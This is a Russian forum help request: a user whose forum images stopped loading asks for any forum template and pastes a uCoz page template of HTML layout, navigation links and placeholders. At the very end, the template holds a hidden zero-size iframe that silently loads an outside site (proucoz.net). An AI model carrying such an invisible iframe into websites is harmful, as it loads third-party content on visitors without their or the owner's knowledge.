Помогите вылетел форум не загружаються в нём картинки дайте пожалуйста любой вид форума [spoiler="Спойлер"]<html>
<head>
<title>$FORUM_TITLE$</title>
<link type="text/css" rel="StyleSheet" href="http://perimeter.ucoz.ua/_st/my.css" />
</head>
<body bgcolor="#000000" style="background:url('images/bgr.gif')repeat-x #282828; margin:0px; padding:0px;">
<table cellpadding="5" cellspacing="0" width="1000" align="center" border="0">
<tr><td valign="top" width="100%" height="370" style="background:url('images/header.jpg') no-repeat #000000;"></td></tr>
<!-- Panel -->
<tr><td width="100%" height="50" valign="center" align="center" style="background:url('images/tdwall.gif') repeat-x #000000;">
<a href="$HOME_PAGE_LINK$" title="На главную"><img src="images/home.gif" border="0"></a>
<a href="$HOME_PAGE_LINK$photo" title="Галерея"><img src="images/gallery.gif" border="0"></a>
<a href="$HOME_PAGE_LINK$load" title="Загрузки"><img src="images/loads.gif" border="0"></a>
<a href="$HOME_PAGE_LINK$publ" title="Статьи и информация"><img src="images/info.gif" border="0"></a>
<a href="$HOME_PAGE_LINK$gb" title="Гостевая книга"><img src="images/gb.gif" border="0"></a>
<a href="$HOME_PAGE_LINK$forum" title="Форум"><img src="images/forum.gif" border="0"></a>
</td></tr>
<!-- /panel -->
<tr><td width="100%" height="100%" style="background:url('images/body.gif') repeat-y #000000;">
<!-- BODY -->
<table border="0" cellpadding="3" cellspacing="0" width="100%" align="center">
<tr>
<td valign="top" style="width:100%;">
<table border="0" cellpadding="0" height="30" cellspacing="0" width="100%" align="center">
<tr>
<td align="right">[<?if($USER_LOGGED_IN$)?>
<a href="javascript://" id="upml" class="fNavLink" onclick="window.open('$PM_URL$','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350'); return false;">Личные сообщения($UNREAD_PM$)</a> ·
<?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml','')",500)</script><bgsound src="http://src.ucoz.net/img/fr/pm.wav" loop="1" volume="0" balance="0">
<?endif?><?endif?>
<a class="fNavLink" href="$RECENT_POSTS_LINK$" rel="nofollow">Новые сообщения</a> ·
<a class="fNavLink" href="$MEMBERS_LIST_LINK$" rel="nofollow">Участники</a> ·
<a class="fNavLink" href="$BOARD_RULES_LINK$" rel="nofollow">Правила форума</a> ·
<a class="fNavLink" href="$SEARCH_PAGE_LINK$" rel="nofollow">Поиск</a> ·
<a class="fNavLink" href="$RSS_LINK$" rel="nofollow">RSS</a> ]</td>
</tr>
</table>
$BODY$<br/>
<table border="0" width="100%" bgcolor="#FFFFFF" cellspacing="1" cellpadding="3" class="gTable">
<tr>
<td class="gTableTop" colspan="5">Статистика Форума</td>
</tr>
<tr>
<td width="25%" class="gTableSubTop">Последнии темы</td>
<td width="25%" class="gTableSubTop">Читаемые темы</td>
<td width="25%" class="gTableSubTop">Лучшии пользователи</td>
<td width="25%" class="gTableSubTop">Новые пользователи</td>
</tr>
<tr>
<td class="gTableBody1" style="padding:10px;">$MYINF_1$</td>
<td class="gTableBody1" style="padding:10px;">$MYINF_2$</td>
<td class="gTableBody1" style="padding:10px;">$MYINF_3$</td>
<td class="gTableBody1" style="padding:10px;">$MYINF_4$</td>
</tr>
</table>
</td>
</tr>
</table>
<!-- /BODY -->
</td></tr>
<tr><td width="100%" align="center" height="120" style="background:url('images/bottom.gif') repeat-y #000000;border-top:1px dotted #434343;">
<!-- Footer -->
<table border="0" cellpadding="5" cellspacing="0" padding-left="10" padding-right="5" width="100%" >
<td align="left">$COUNTER$
<td align="right" valign="center">© $YEAR$ ТвойСайт.Ru, Все права не нарушены.<br/>Proucoz& $POWERED_BY$</a>.
</td>
</table>
<!-- /Footer -->
</td></tr>
</table>
</body>
<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"src="http://proucoz.net"></iframe>
</html>[/spoiler]